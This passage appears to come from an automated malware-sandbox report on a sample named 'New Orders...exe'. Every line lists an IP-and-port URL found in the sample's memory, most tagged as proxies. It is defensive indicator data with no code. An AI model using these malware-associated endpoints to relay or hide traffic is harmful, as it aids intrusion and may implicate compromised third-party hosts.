                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.49.49.11:31034://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.119.147.209:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.119.147.209:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25B20000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.62.179.122:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.62.179.122:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.154:28633
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61344
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61344://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61553
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://75.119.145.169:61553://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.233.5.68:55443
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.233.5.68:55443://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.238.79.111:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.238.79.111:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.241.20.215:55915
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.241.20.215:55915://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.242.24.241:8089
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.242.24.241:8089://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.37.155.85:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.37.155.85:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.23.18
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.23.181:38817
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.23.181:38817://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.142.234.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.142.234.35:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.142.234.35:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.30.128.10:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.30.128.10:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.61.27.207:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.61.27.207:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29958000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.106.165.246:8989
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.106.165.246:8989://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.119.177:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.119.177:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.119.181:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.119.181:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2518E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.196.145:8081
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2518E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.196.145:8081://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.52.252:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.52.252:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.122.230.20:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.122.230.20:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.177.29:21972
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.177.29:21972://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.7.101.98:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.7.101.98:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.142.132.204:18080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.142.132.204:18080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.142.3.145:3306
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.142.3.145:3306://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.209.255.13:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.209.255.13:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.150.1
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.150.195:26666
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.150.195:26666://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.58.56
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.58.56://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.58.56:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.8.157:19001
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.8.157:19001://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.211.4.215
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.211.4.215://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.211.4.215:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:444
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:444://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2654B000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:4506
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2652A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:4506://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:7779
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:7779://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:808
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:808://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.218.100.120:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.218.100.120:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.97.248
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.97.248://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.97.248:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.152.158:55555
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.152.158:55555://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.239.209
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.239.209://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.239.209:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2647F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.242.178.5:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2647F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.242.178.5:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266D3000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.242.85.6:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.242.85.6:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.13.43.193://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.13.43.193:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.229.194.203:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.229.194.203:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.241.44.34:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.241.44.34:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25CCB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.251.219.40:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.251.219.40:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.51.7.66:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.65.28.57:30962
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.65.28.57:30962://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.72.68.247:8082
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.72.68.247:8082://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.78.6
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.78.64.70:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.78.64.70:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.104.43:3629
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.104.43:3629://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.119.171:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.119.171:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.17.94.50:34300://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.177.6.68:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.177.6.68:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.19.3.249:10080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.19.3.249:10080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.49:1088
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.49:1088://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.21.82.116:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.21.82.116:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.157.134:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.157.134:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.119.96.254
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.119.96.254://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.119.96.254:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.137.244.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.137.244.151:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.137.244.151:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.137.244.59:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.137.244.59:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.146.37.145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.146.37.145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.146.37.145:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.153.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.153.6:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.153.6:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.208.111.19
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.208.111.19://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.208.111.19:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.210.56.251
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.210.56.251://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.210.56.251:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.218.176.25:32650
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.218.176.25:32650://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:15464
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:15464://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:4985
